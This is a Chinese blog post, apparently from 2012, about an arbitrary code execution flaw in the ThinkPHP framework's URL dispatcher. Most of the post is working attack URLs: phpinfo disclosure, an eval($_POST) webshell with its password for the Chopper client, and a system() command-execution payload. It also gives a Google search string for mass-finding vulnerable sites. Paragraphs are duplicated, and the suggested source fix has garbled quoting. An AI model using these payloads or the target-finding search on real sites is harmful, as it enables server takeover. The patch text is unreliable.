thinkphp任意代码执行漏洞
2012-05-20 12:33
886 查看
http://site.com/index.php/module/action/param1/${@phpinfo()}
直接拿SHELL
index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@print(phpinfo())%7D
ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
直接拿SHELL
index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@print(phpinfo())%7D
ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)}
index.php/module/aciton/param1/${@function_all()} 其中function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()} 获取服务器的系统配置信息等。 index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al 列出网站文件列表 index.php/module/action/param1/{${eval($_POST[s])}} 直接执行一句话代码,用菜刀直接连接. 黑阔可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。 thinkphp框架执行任意代码漏洞修复方法:
用户可下载官方发布的补丁: http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838 或者或者直接修改源码: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 修改为 $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths)); 将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
相关文章推荐
- [2012-4-10]ThinkPHP框架被爆任意代码执行漏洞(preg_replace)
- ThinkPHP framework 任意代码执行漏洞预警
- ThinkPHP框架任意代码执行漏洞的利用及其修复方法
- ThinkPHP2.2 任意代码执行漏洞 利用
- ThinkPHP框架任意代码执行漏洞的利用及其修复方法
- thinkphp任意代码执行漏洞
- Thinkphp框架任意代码执行漏洞利用及修复
- ThinkPHP framework 任意代码执行漏洞预警
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- phpcms前台任意代码执行漏洞(php<5.3)
- Struts2/XWork远程执行任意代码漏洞
- Nginx %00空字节执行任意代码(php)漏洞
- nginx NULL-Byte 任意代码执行漏洞
- Nginx %00空字节执行任意代码(php)漏洞
- 【技术分享】TP-Link WR841N路由器任意代码执行漏洞分析(附演示视频)
- Hive任意命令/代码执行漏洞+渗透实例
- 格式化字符串漏洞执行任意代码分析
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- WordPress wp-includes/functions.php脚本远程任意代码执行漏洞
- GitHub修复了允许任意代码执行的安全漏洞 Windows不受影响